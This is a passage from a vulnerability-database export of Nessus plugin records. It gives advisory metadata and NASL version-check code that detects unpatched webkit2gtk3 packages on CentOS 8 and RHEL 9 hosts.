(rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'glib2 / glib2-devel / glib2-doc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:37:37", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2022:7704 advisory.\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624, CVE-2022-22628, CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n - webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n - webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700, CVE-2022-26716, CVE-2022-26719)\n\n - webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-08T00:00:00", "type": "nessus", "title": "CentOS 8 : webkit2gtk3 (CESA-2022:7704)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-08T00:00:00", "cpe": ["cpe:/o:centos:centos:8-stream", "p-cpe:/a:centos:centos:webkit2gtk3", "p-cpe:/a:centos:centos:webkit2gtk3-devel", "p-cpe:/a:centos:centos:webkit2gtk3-jsc", "p-cpe:/a:centos:centos:webkit2gtk3-jsc-devel"], "id": "CENTOS8_RHSA-2022-7704.NASL", "href": "https://www.tenable.com/plugins/nessus/167122", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2022:7704. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167122);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/08\");\n\n script_cve_id(\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\"\n );\n script_xref(name:\"RHSA\", value:\"2022:7704\");\n\n script_name(english:\"CentOS 8 : webkit2gtk3 (CESA-2022:7704)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2022:7704 advisory.\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624, CVE-2022-22628,\n CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n - webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n - webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700, CVE-2022-26716,\n CVE-2022-26719)\n\n - webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code\n execution (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2022:7704\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30293\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26719\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:webkit2gtk3-jsc-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/CentOS/release');\nif (isnull(os_release) || 'CentOS' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS');\nvar os_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS 8-Stream');\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T18:36:31", "description": "The remote Redhat Enterprise Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2022:8054 advisory.\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624, CVE-2022-22628, CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n - webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n - webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700, CVE-2022-26716, CVE-2022-26719)\n\n - webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-16T00:00:00", "type": "nessus", "title": "RHEL 9 : webkit2gtk3 (RHSA-2022:8054)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:9", "cpe:/o:redhat:rhel_aus:9.2", "cpe:/o:redhat:rhel_e4s:9.2", "cpe:/o:redhat:rhel_eus:9.2", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel"], "id": "REDHAT-RHSA-2022-8054.NASL", "href": "https://www.tenable.com/plugins/nessus/167607", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2022:8054. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167607);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\n \"CVE-2022-22624\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22662\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\"\n );\n script_xref(name:\"RHSA\", value:\"2022:8054\");\n\n script_name(english:\"RHEL 9 : webkit2gtk3 (RHSA-2022:8054)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 9 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2022:8054 advisory.\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624, CVE-2022-22628,\n CVE-2022-26709, CVE-2022-26710, CVE-2022-26717)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n\n - webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n\n - webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700, CVE-2022-26716,\n CVE-2022-26719)\n\n - webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code\n execution (CVE-2022-30293)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22624\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22628\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22629\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26700\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26709\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26716\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26717\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-26719\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-30293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2022:8054\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2073893\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2073896\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2073899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2082548\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092732\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092733\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092734\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092735\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2092736\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2104787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2104789\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30293\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26719\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(120, 200, 416, 787, 1173);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '9')) audit(AUDIT_OS_NOT, 'Red Hat 9.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel9/9.2/x86_64/appstream/debug',\n 'content/aus/rhel9/9.2/x86_64/appstream/os',\n 'content/aus/rhel9/9.2/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel9/9.2/x86_64/baseos/debug',\n 'content/aus/rhel9/9.2/x86_64/baseos/os',\n 'content/aus/rhel9/9.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/aarch64/appstream/debug',\n 'content/e4s/rhel9/9.2/aarch64/appstream/os',\n 'content/e4s/rhel9/9.2/aarch64/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/aarch64/baseos/debug',\n 'content/e4s/rhel9/9.2/aarch64/baseos/os',\n 'content/e4s/rhel9/9.2/aarch64/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/aarch64/highavailability/debug',\n 'content/e4s/rhel9/9.2/aarch64/highavailability/os',\n 'content/e4s/rhel9/9.2/aarch64/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/appstream/debug',\n 'content/e4s/rhel9/9.2/ppc64le/appstream/os',\n 'content/e4s/rhel9/9.2/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/baseos/debug',\n 'content/e4s/rhel9/9.2/ppc64le/baseos/os',\n 'content/e4s/rhel9/9.2/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/highavailability/debug',\n 'content/e4s/rhel9/9.2/ppc64le/highavailability/os',\n 'content/e4s/rhel9/9.2/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/resilientstorage/debug',\n 'content/e4s/rhel9/9.2/ppc64le/resilientstorage/os',\n 'content/e4s/rhel9/9.2/ppc64le/resilientstorage/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel9/9.2/ppc64le/sap-solutions/os',\n 'content/e4s/rhel9/9.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel9/9.2/ppc64le/sap/debug',\n 'content/e4s/rhel9/9.2/ppc64le/sap/os',\n 'content/e4s/rhel9/9.2/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/appstream/debug',\n 'content/e4s/rhel9/9.2/s390x/appstream/os',\n 'content/e4s/rhel9/9.2/s390x/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/baseos/debug',\n 'content/e4s/rhel9/9.2/s390x/baseos/os',\n 'content/e4s/rhel9/9.2/s390x/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/highavailability/debug',\n 'content/e4s/rhel9/9.2/s390x/highavailability/os',\n 'content/e4s/rhel9/9.2/s390x/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/resilientstorage/debug',\n 'content/e4s/rhel9/9.2/s390x/resilientstorage/os',\n 'content/e4s/rhel9/9.2/s390x/resilientstorage/source/SRPMS',\n 'content/e4s/rhel9/9.2/s390x/sap/debug',\n 'content/e4s/rhel9/9.2/s390x/sap/os',\n 'content/e4s/rhel9/9.2/s390x/sap/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/appstream/debug',\n 'content/e4s/rhel9/9.2/x86_64/appstream/os',\n 'content/e4s/rhel9/9.2/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/baseos/debug',\n 'content/e4s/rhel9/9.2/x86_64/baseos/os',\n 'content/e4s/rhel9/9.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/highavailability/debug',\n 'content/e4s/rhel9/9.2/x86_64/highavailability/os',\n 'content/e4s/rhel9/9.2/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/resilientstorage/debug',\n 'content/e4s/rhel9/9.2/x86_64/resilientstorage/os',\n 'content/e4s/rhel9/9.2/x86_64/resilientstorage/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/sap-solutions/debug',\n 'content/e4s/rhel9/9.2/x86_64/sap-solutions/os',\n 'content/e4s/rhel9/9.2/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel9/9.2/x86_64/sap/debug',\n 'content/e4s/rhel9/9.2/x86_64/sap/os',\n 'content/e4s/rhel9/9.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/appstream/debug',\n 'content/eus/rhel9/9.2/aarch64/appstream/os',\n 'content/eus/rhel9/9.2/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/baseos/debug',\n 'content/eus/rhel9/9.2/aarch64/baseos/os',\n 'content/eus/rhel9/9.2/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/codeready-builder/debug',\n 'content/eus/rhel9/9.2/aarch64/codeready-builder/os',\n 'content/eus/rhel9/9.2/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/highavailability/debug',\n 'content/eus/rhel9/9.2/aarch64/highavailability/os',\n 'content/eus/rhel9/9.2/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/aarch64/supplementary/debug',\n 'content/eus/rhel9/9.2/aarch64/supplementary/os',\n 'content/eus/rhel9/9.2/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/appstream/debug',\n 'content/eus/rhel9/9.2/ppc64le/appstream/os',\n 'content/eus/rhel9/9.2/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/baseos/debug',\n 'content/eus/rhel9/9.2/ppc64le/baseos/os',\n 'content/eus/rhel9/9.2/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/codeready-builder/debug',\n 'content/eus/rhel9/9.2/ppc64le/codeready-builder/os',\n 'content/eus/rhel9/9.2/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/highavailability/debug',\n 'content/eus/rhel9/9.2/ppc64le/highavailability/os',\n 'content/eus/rhel9/9.2/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/resilientstorage/debug',\n 'content/eus/rhel9/9.2/ppc64le/resilientstorage/os',\n 'content/eus/rhel9/9.2/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/sap-solutions/debug',\n 'content/eus/rhel9/9.2/ppc64le/sap-solutions/os',\n 'content/eus/rhel9/9.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/sap/debug',\n 'content/eus/rhel9/9.2/ppc64le/sap/os',\n 'content/eus/rhel9/9.2/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/ppc64le/supplementary/debug',\n 'content/eus/rhel9/9.2/ppc64le/supplementary/os',\n 'content/eus/rhel9/9.2/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/appstream/debug',\n 'content/eus/rhel9/9.2/s390x/appstream/os',\n 'content/eus/rhel9/9.2/s390x/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/baseos/debug',\n 'content/eus/rhel9/9.2/s390x/baseos/os',\n 'content/eus/rhel9/9.2/s390x/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/codeready-builder/debug',\n 'content/eus/rhel9/9.2/s390x/codeready-builder/os',\n 'content/eus/rhel9/9.2/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/highavailability/debug',\n 'content/eus/rhel9/9.2/s390x/highavailability/os',\n 'content/eus/rhel9/9.2/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/debug',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/os',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/sap/debug',\n 'content/eus/rhel9/9.2/s390x/sap/os',\n 'content/eus/rhel9/9.2/s390x/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/supplementary/debug',\n 'content/eus/rhel9/9.2/s390x/supplementary/os',\n 'content/eus/rhel9/9.2/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/appstream/debug',\n 'content/eus/rhel9/9.2/x86_64/appstream/os',\n 'content/eus/rhel9/9.2/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/baseos/debug',\n 'content/eus/rhel9/9.2/x86_64/baseos/os',\n 'content/eus/rhel9/9.2/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/debug',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/os',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/highavailability/debug',\n 'content/eus/rhel9/9.2/x86_64/highavailability/os',\n 'content/eus/rhel9/9.2/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/debug',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/os',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/debug',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/os',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/sap/debug',\n 'content/eus/rhel9/9.2/x86_64/sap/os',\n 'content/eus/rhel9/9.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/supplementary/debug',\n 'content/eus/rhel9/9.2/x86_64/supplementary/os',\n 'content/eus/rhel9/9.2/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el9', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n 